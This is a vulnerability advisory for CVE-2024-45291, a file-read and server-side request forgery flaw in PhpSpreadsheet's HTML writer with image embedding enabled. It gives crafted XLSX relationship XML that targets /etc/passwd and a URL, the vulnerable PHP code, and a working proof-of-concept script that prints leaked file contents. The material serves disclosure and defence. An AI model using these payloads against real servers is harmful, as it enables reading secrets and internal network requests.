CVE-2024-45291

Description

### Summary It's possible for an attacker to construct an XLSX file that links images from arbitrary paths. When embedding images has been enabled in HTML writer with `$writer->setEmbedImages(true);` those files will be included in the output as `data:` URLs, regardless of the file's type. Also URLs can be used for embedding, resulting in a Server-Side Request Forgery vulnerability. ### Details XLSX files allow embedding or linking media. When In `xl/drawings/drawing1.xml` an attacker can do e.g.: ```xml <a:blip cstate="print" r:link="rId1" /> ``` And then, in `xl/drawings/_rels/drawing1.xml.rels` they can set the path to anything, such as: ```xml <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/etc/passwd" /> ``` or ```xml <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://example.org" /> ``` When the HTML writer is outputting the image, it does not check the path in any way. Also the `getimagesize()` call does not mitigate this, because when `getimagesize()` returns false, an empty mime type is used. ```php if ($this->embedImages || str_starts_with($imageData, 'zip://')) { $picture = @file_get_contents($filename); if ($picture !== false) { $imageDetails = getimagesize($filename) ?: ['mime' => '']; // base64 encode the binary data $base64 = base64_encode($picture); $imageData = 'data:' . $imageDetails['mime'] . ';base64,' . $base64; } } $html .= '<img style="position: absolute; z-index: 1; left: ' . $drawing->getOffsetX() . 'px; top: ' . $drawing->getOffsetY() . 'px; width: ' . $drawing->getWidth() . 'px; height: ' . $drawing->getHeight() . 'px;" src="' . $imageData . '" alt="' . $filedesc . '" />'; ``` ### PoC ```php <?php require 'vendor/autoload.php'; $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx"); $spreadsheet = $reader->load(__DIR__ . '/book.xlsx'); $writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); $writer->setEmbedImages(true); $output = $writer->generateHTMLAll(); // The below is just for demo purposes $pattern = '/data:;base64,(?<data>[^"]+)/i'; preg_match_all($pattern, $output, $matches); print("*** /etc/passwd content: ***\n"); print(base64_decode($matches['data'][0])); print("*** HTTP response content: ***\n"); print(base64_decode($matches['data'][1])); ``` Add this file in the same directory: [book.xlsx](https://github.com/PHPOffice/PhpSpreadsheet/files/15213066/book.xlsx) Run with: `php index.php` ### Impact When embedding images has been enabled, an attacker can read arbitrary files on the server and perform arbitrary HTTP GET requests, potentially e.g. [revealing secrets](https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/). Note that any PHP protocol wrappers can be used, meaning that if for example the `expect://` wrapper is enabled, also remote code execution is possible.